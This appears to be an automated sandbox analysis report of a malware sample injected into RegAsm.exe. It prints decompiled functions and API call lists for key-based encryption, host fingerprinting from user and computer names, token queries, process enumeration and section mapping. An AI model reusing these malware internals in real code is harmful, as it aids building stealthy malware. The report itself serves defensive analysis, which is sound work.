Opcode ID: c2b5c36200f3e1c4beb06072f3b51c21f5b79b7396582ea4e639916d0b4b6051
Instruction ID: 96078ba4ea283c0ddbc40fff63ce1b45f807c23b1413a65ae9e987e172f23c79
Opcode Fuzzy Hash: c2b5c36200f3e1c4beb06072f3b51c21f5b79b7396582ea4e639916d0b4b6051
Instruction Fuzzy Hash: BB41C571401312ABD321EF759D4896BBAECEFC4755F10093BF511F62A4E738CA448BAA

Uniqueness

Uniqueness Score: -1.00%

Function 010A7479, Relevance: 19.7, APIs: 13, Instructions: 163
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E010A7479(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				BYTE* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				int _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				BYTE* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x10aa0bc( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x10aa0a8() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E010A4573(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x10aa0b4(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 =  &(_t102[_t90]);
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E010A2625(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}

0x010a7482
0x010a7488
0x010a748b
0x010a7491
0x010a7491
0x010a7493
0x010a7495
0x010a7498
0x010a749e
0x010a749f
0x010a74a0
0x010a74a6
0x010a74ab
0x010a74b1
0x010a74b9
0x010a7616
0x010a74bf
0x010a74c1
0x010a74ca
0x010a74cf
0x010a74e1
0x010a74e4
0x010a74e8
0x010a74ef
0x010a74f3
0x010a74fb
0x010a7601
0x010a7501
0x010a7501
0x010a7505
0x010a7506
0x010a7508
0x010a7513
0x010a75ed
0x010a7519
0x010a7519
0x010a751c
0x010a7522
0x010a7528
0x010a7528
0x010a7530
0x010a7534
0x010a7537
0x010a75de
0x010a753d
0x010a7543
0x010a7546
0x010a7549
0x010a754b
0x010a754e
0x010a7551
0x010a7553
0x010a7553
0x010a755d
0x010a7562
0x010a7565
0x010a7568
0x010a756a
0x010a7573
0x010a759d
0x010a7575
0x010a7586
0x010a7586
0x010a75a5
0x00000000
0x00000000
0x010a75a7
0x010a75aa
0x010a75ad
0x010a75b1
0x00000000
0x010a75b3
0x010a75c2
0x010a75c8
0x010a75d0
0x010a75d0
0x00000000
0x010a75b1
0x010a75b5
0x010a75bd
0x010a75c0
0x010a75d7
0x00000000
0x00000000
0x00000000
0x010a75c0
0x010a7537
0x010a75f0
0x010a75f3
0x010a75f3
0x010a7608
0x010a7608
0x010a7620

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,010A21EB,00000001,010A2E14,00000000), ref: 010A74B1
memcpy.NTDLL(010A21EB,010A2E14,00000010,?,?,?,010A21EB,00000001,010A2E14,00000000,?,010A27E3,00000000,010A2E14,?,00000000), ref: 010A74CA
CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 010A74F3
CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 010A750B
memcpy.NTDLL(00000000,00000000,03409630,00000010), ref: 010A755D
CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,03409630,00000020,?,?,00000010), ref: 010A7586
CryptDecrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,03409630,?,?,00000010), ref: 010A759D
GetLastError.KERNEL32(?,?,00000010), ref: 010A75B5
GetLastError.KERNEL32 ref: 010A75E7
CryptDestroyKey.ADVAPI32(00000000), ref: 010A75F3
GetLastError.KERNEL32 ref: 010A75FB
CryptReleaseContext.ADVAPI32(?,00000000), ref: 010A7608
GetLastError.KERNEL32(?,?,?,010A21EB,00000001,010A2E14,00000000,?,010A27E3,00000000,010A2E14,?,00000000,010A2E14,00000000,03409630), ref: 010A7610

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
String ID:
API String ID: 1967744295-0
Opcode ID: 0f39ba50b6b59bc499f50bd8a461a629673c8aa027f996b39b275459389a3427
Instruction ID: 3b78994a47fc2b66196012527601e1f62757d49c25d83a52edaf35621ce41424
Opcode Fuzzy Hash: 0f39ba50b6b59bc499f50bd8a461a629673c8aa027f996b39b275459389a3427
Instruction Fuzzy Hash: 7B516C71A00249FFDB21DFF8D884AEEBBB9EB04350F448465F985E6240D7769E14CB61

Uniqueness

Uniqueness Score: -1.00%

Function 010A42A6, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 102
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E010A42A6(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x10aa2c8; // 0xbd092303
					_v12 = _t59;
				}
				_t64 = _t69;
				E010A62E6( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x10aa2d0 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x10aa290, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E010A2836(_v8 + _v8, _t63);
							}
							HeapFree( *0x10aa290, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x10aa290, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E010A2836(_v8 + _v8, _t63);
						}
						HeapFree( *0x10aa290, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}

0x010a42a6
0x010a42ae
0x010a42b4
0x010a42b7
0x010a42ba
0x010a42bc
0x010a42c1
0x010a42c1
0x010a42c7
0x010a42c9
0x010a42d6
0x010a4337
0x010a42d8
0x010a42dd
0x010a42e3
0x010a42e8
0x010a42f6
0x010a42fa
0x010a4309
0x010a4310
0x010a4317
0x010a4317
0x010a4322
0x010a4322
0x010a42fa
0x010a42e8
0x010a4339
0x010a433f
0x010a4349
0x010a434b
0x010a4350
0x010a435f
0x010a4363
0x010a436e
0x010a4375
0x010a437c
0x010a437c
0x010a4388
0x010a4388
0x010a4363
0x010a4391
0x010a4393
0x010a4396
0x010a4398
0x010a439b
0x010a439e
0x010a43a8
0x010a43ac
0x010a43b0

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 010A42DD
RtlAllocateHeap.NTDLL(00000000,?), ref: 010A42F4
GetUserNameW.ADVAPI32(00000000,?), ref: 010A4301
HeapFree.KERNEL32(00000000,00000000,?,?,010A5995,?,00000000), ref: 010A4322
GetComputerNameW.KERNEL32(00000000,00000000), ref: 010A4349
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 010A435D
GetComputerNameW.KERNEL32(00000000,00000000), ref: 010A436A
HeapFree.KERNEL32(00000000,00000000,?,?,010A5995,?,00000000), ref: 010A4388

Strings

Ut, xrefs: 010A4322, 010A4388

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID: Ut
API String ID: 3239747167-8415677
Opcode ID: b9a0f582fef7e2bda61898be8fc7e62c8de9821e7ca52cbe9cab65bf631efa40
Instruction ID: 92180918d381a59e6afca332499098bf5aeef2283756a52c7a92345857a7b578
Opcode Fuzzy Hash: b9a0f582fef7e2bda61898be8fc7e62c8de9821e7ca52cbe9cab65bf631efa40
Instruction Fuzzy Hash: 71316B76A00609EFDB61DFA9DC80AAEBBF9FF48300F948069E585D7240D775EA00DB10

Uniqueness

Uniqueness Score: -1.00%

Function 00401C44, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E00401C44(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L004020C0();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x404184;
				_push(_t15 + 0x40505e);
				_push(_t15 + 0x405054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L004020BA();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x404188, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x00401c44
0x00401c4d
0x00401c51
0x00401c57
0x00401c5c
0x00401c61
0x00401c64
0x00401c67
0x00401c6c
0x00401c6d
0x00401c70
0x00401c7b
0x00401c82
0x00401c86
0x00401c88
0x00401c89
0x00401c8c
0x00401c91
0x00401c9b
0x00401c9d
0x00401c9d
0x00401cb1
0x00401cb7
0x00401cbb
0x00401d0b
0x00401cbd
0x00401cc6
0x00401cdc
0x00401ce4
0x00401cf6
0x00401cfa
0x00000000
0x00000000
0x00401ce6
0x00401ce9
0x00401cee
0x00401cf0
0x00401cf0
0x00401cd1
0x00401cd3
0x00401cfc
0x00401cfd
0x00401cfd
0x00401cc6
0x00401d13

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,004011C4,0000000A,?), ref: 00401C51
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00401C67
_snwprintf.NTDLL ref: 00401C8C
CreateFileMappingW.KERNELBASE(000000FF,00404188,00000004,00000000,?,?), ref: 00401CB1
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004011C4,0000000A), ref: 00401CC8
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00401CDC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004011C4,0000000A), ref: 00401CF4
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004011C4), ref: 00401CFD
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004011C4,0000000A), ref: 00401D05

Memory Dump Source

Source File: 00000008.00000002.521792829.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.521817363.0000000000405000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.521835908.0000000000407000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: b49f39dfc47497593bf48bf6260620371de2592feb7c86be74e1240710c9d34b
Instruction ID: 1ebfdf0be0fa7cd3eeb39376eeaef9b64c9c5faf48520152fe66cb9294a365e2
Opcode Fuzzy Hash: b49f39dfc47497593bf48bf6260620371de2592feb7c86be74e1240710c9d34b
Instruction Fuzzy Hash: B421F8B2600104BFD711AF94DD84E9F7BADEB48351F114036F605F72E0D6789A41CB68

Uniqueness

Uniqueness Score: -1.00%

Function 03F016AF, Relevance: 12.1, APIs: 8, Instructions: 114
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,03F2C1AC,00000000), ref: 03F016DD
StrRChrA.SHLWAPI(043AA5B0,00000000,0000005C), ref: 03F016F2
_strupr.NTDLL ref: 03F01708
lstrlen.KERNEL32(043AA5B0), ref: 03F01710
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 03F01790
RtlAddVectoredExceptionHandler.NTDLL(00000000,03F1BB66), ref: 03F017B7
GetLastError.KERNEL32(?), ref: 03F017D1
RtlRemoveVectoredExceptionHandler.NTDLL(00E7EAD8), ref: 03F017E7

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: DescriptorExceptionHandlerSecurityVectored$ConvertCreateErrorEventLastRemoveString_struprlstrlen
String ID:
API String ID: 1098824789-0
Opcode ID: e96c982358512bfed5270554ac2634c4639ccb894f28c0467dbb616a5b392cdf
Instruction ID: f354279803c595dbd17eb17faa8aa36119eb1511aef05eac83bf9fb6a5ec3bb8
Opcode Fuzzy Hash: e96c982358512bfed5270554ac2634c4639ccb894f28c0467dbb616a5b392cdf
Instruction Fuzzy Hash: 56314676D0022DEFE730FF7C9CA596FBBA8AB15750F180229E911E31C4D77088809B90

Uniqueness

Uniqueness Score: -1.00%

Function 010A231E, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E010A231E(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E010A4573(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E010A2625(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x010a232b
0x010a232c
0x010a232d
0x010a232e
0x010a232f
0x010a2333
0x010a233a
0x010a2349
0x010a234c
0x010a234f
0x010a2356
0x010a2359
0x010a235c
0x010a235f
0x010a2362
0x010a236d
0x010a236f
0x010a2378
0x010a2380
0x010a2382
0x010a2394
0x010a239e
0x010a23a2
0x010a23b1
0x010a23b5
0x010a23be
0x010a23c6
0x010a23c6
0x010a23c8
0x010a23c8
0x010a23d0
0x010a23d6
0x010a23da
0x010a23da
0x010a23e5

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 010A2365
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 010A2378
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 010A2394

Part of subcall function 010A4573: RtlAllocateHeap.NTDLL(00000000,00000000,010A5A3F), ref: 010A457F

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 010A23B1
memcpy.NTDLL(00000000,00000000,0000001C), ref: 010A23BE
NtClose.NTDLL(?), ref: 010A23D0
NtClose.NTDLL(00000000), ref: 010A23DA

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 5384d66e3de80ed525d7752b1b73bf51fa764c0c621d106bb470d6983f187f1d
Instruction ID: 5c7a78e7c57be40f7482aa764bedf87f1515f050f061d083c8863fa0ecdcd8df
Opcode Fuzzy Hash: 5384d66e3de80ed525d7752b1b73bf51fa764c0c621d106bb470d6983f187f1d
Instruction Fuzzy Hash: 9B211672A0021DBBDB11AF94CC44ADEBFBDEF08754F504066FA40EA110D7B29A44DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03F229E0, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON

Download Yara Rule

APIs

NtOpenProcess.NTDLL(?,00000400,?,?), ref: 03F22A27
NtOpenProcessToken.NTDLL(?,00000008,?), ref: 03F22A3A
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?), ref: 03F22A56

Part of subcall function 03F163A7: RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?), ref: 03F22A73
memcpy.NTDLL(?,00000000,0000001C), ref: 03F22A80
NtClose.NTDLL(?), ref: 03F22A92
NtClose.NTDLL(?), ref: 03F22A9C

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 7196668d6e45fbfcad7cb62cae8ea8ec501473691d6d3538bd06938970117b7c
Instruction ID: 1d5e7aab685954f573bdf448a170dc7a9311f6f8dd43b3aa714670ba852c9bea
Opcode Fuzzy Hash: 7196668d6e45fbfcad7cb62cae8ea8ec501473691d6d3538bd06938970117b7c
Instruction Fuzzy Hash: 2221F4B6900229FBDF11EF95DC449DEBFB9EB08740F104066F901E6150D7B58A559BA0

Uniqueness

Uniqueness Score: -1.00%

Function 03F17523, Relevance: 9.1, APIs: 6, Instructions: 94threadmemorynativeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 03F1754E
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 03F1755B
NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 03F175E7
GetModuleHandleA.KERNEL32(00000000), ref: 03F175F2
RtlImageNtHeader.NTDLL(00000000), ref: 03F175FB
RtlExitUserThread.NTDLL(00000000), ref: 03F17610

Part of subcall function 03F10E02: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,03F17589,?), ref: 03F10E0A
Part of subcall function 03F10E02: GetVersion.KERNEL32 ref: 03F10E19
Part of subcall function 03F10E02: GetCurrentProcessId.KERNEL32 ref: 03F10E28
Part of subcall function 03F10E02: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 03F10E45

Part of subcall function 03F17FF4: memcpy.NTDLL(00000000,00000000,?,?,00000000,00000001,?,?,00000000,?,?,?,?,?,03F17597,?), ref: 03F18053

Part of subcall function 03F199FB: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,03F04D64), ref: 03F19A21

Part of subcall function 03F1F5F1: OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,?,?,03F1E52B,00000000,00000000,00000000,00000000,?,03F2C1E4,03F07294,03F2C1E4), ref: 03F1F60C
Part of subcall function 03F1F5F1: IsWow64Process.KERNEL32(?,00000000,?,00000000,?,?,03F1E52B,00000000,00000000,00000000,00000000,?,03F2C1E4,03F07294,03F2C1E4,00000000), ref: 03F1F61D
Part of subcall function 03F1F5F1: CloseHandle.KERNEL32(?,?,?,03F1E52B,00000000,00000000,00000000,00000000,?,03F2C1E4,03F07294,03F2C1E4,00000000,?,?,03F14958), ref: 03F1F630

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Process$CreateFileHandleModuleOpenThreadTime$CloseCurrentEventExitHeaderHeapImageInformationNameQuerySystemUserVersionWow64memcpy
String ID:
API String ID: 3825956196-0
Opcode ID: 6b51018dc81508eb6d888dc13b9694935754f810c1975e7c5dbbf99c44cf2cf2
Instruction ID: 3f42d0094f7935b5c60cb7d3b72940d5273dce2b6fe235c2eb633f543721c57a
Opcode Fuzzy Hash: 6b51018dc81508eb6d888dc13b9694935754f810c1975e7c5dbbf99c44cf2cf2
Instruction Fuzzy Hash: 0731F536D00219EFCB21FF68EC94EAEBBB8EB44750B140164E516EB254EB70CD54CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03F1B38D, Relevance: 7.7, APIs: 5, Instructions: 234nativeCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,03F1BE7A,00000800,?,?,00000000,00000000), ref: 03F1B5CE

Part of subcall function 03F16239: GetModuleHandleA.KERNEL32(?,00000020,?,?,00000FFF,?,?,?,03F1B49C,3D03F261,?,?,00000000,00000000), ref: 03F1625E
Part of subcall function 03F16239: GetProcAddress.KERNEL32(00000000,?), ref: 03F16280
Part of subcall function 03F16239: GetProcAddress.KERNEL32(00000000,?), ref: 03F16296
Part of subcall function 03F16239: GetProcAddress.KERNEL32(00000000,?), ref: 03F162AC
Part of subcall function 03F16239: GetProcAddress.KERNEL32(00000000,?), ref: 03F162C2
Part of subcall function 03F16239: GetProcAddress.KERNEL32(00000000,?), ref: 03F162D8

Part of subcall function 03F0D317: NtMapViewOfSection.NTDLL(00000000,000000FF,03F1CF61,00000000,00000000,03F1CF61,00000000,00000002,00000000,?,?,00000000,03F1CF61,000000FF,00000000), ref: 03F0D345

Part of subcall function 03F1854D: memcpy.NTDLL(?,?,03F21CF9,?,?,00000FFF,03F171AF,03F171AF,3D03F261,?,?,00000000,00000000), ref: 03F185B3
Part of subcall function 03F1854D: memcpy.NTDLL(00000000,?,?), ref: 03F18612

memcpy.NTDLL(?,?,00000000,?,?,03F171AF,03F171AF,03F171AF,3D03F261,?,?,00000000,00000000), ref: 03F1B4FB
memcpy.NTDLL(?,?,00000018,?,?,03F171AF,03F171AF,03F171AF,3D03F261,?,?,00000000,00000000), ref: 03F1B547
NtUnmapViewOfSection.NTDLL(000000FF,00000000,00000000,00000000), ref: 03F1B60C
memset.NTDLL ref: 03F1B64E

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: AddressProcmemcpy$SectionView$HandleModuleUnmapmemset
String ID:
API String ID: 1575695328-0
Opcode ID: e1ff60757612ffd6332c0e15187337dd35bf292bc2c8525395c10ea989230ef5
Instruction ID: ffd048cc292750ff58dcab31fa6fbf1465bb7fd7aab5083d6b5379487348f438
Opcode Fuzzy Hash: e1ff60757612ffd6332c0e15187337dd35bf292bc2c8525395c10ea989230ef5
Instruction Fuzzy Hash: 13914D75D0020AEFCF14DF99D984BAEBBB4FF08304F1441A9E805A7254D775AE64DB90

Uniqueness

Uniqueness Score: -1.00%

Function 010A1141, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E010A1141() {
				char _v264;
				void* _v300;
				void* _t5;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
				_t17 = _t5;
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x10aa2d4; // 0x235d5a8
						_t2 = _t9 + 0x10abe58; // 0x73617661
						_push( &_v264);
						if( *0x10aa118() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x010a114c
0x010a1151
0x010a1156
0x010a115a
0x010a1164
0x010a1195
0x010a116b
0x010a1170
0x010a117d
0x010a1186
0x010a119d
0x010a1188
0x010a1190
0x00000000
0x010a1190
0x010a119e
0x010a119f
0x00000000
0x010a119f
0x00000000
0x010a1199
0x010a11a5
0x010a11aa

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 010A1151
Process32First.KERNEL32(00000000,?), ref: 010A1164
Process32Next.KERNEL32(00000000,?), ref: 010A1190
CloseHandle.KERNEL32(00000000), ref: 010A119F

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

